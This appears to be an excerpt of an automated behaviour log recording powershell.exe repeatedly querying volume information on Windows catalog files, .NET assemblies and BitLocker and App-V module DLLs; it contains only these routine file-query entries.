Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
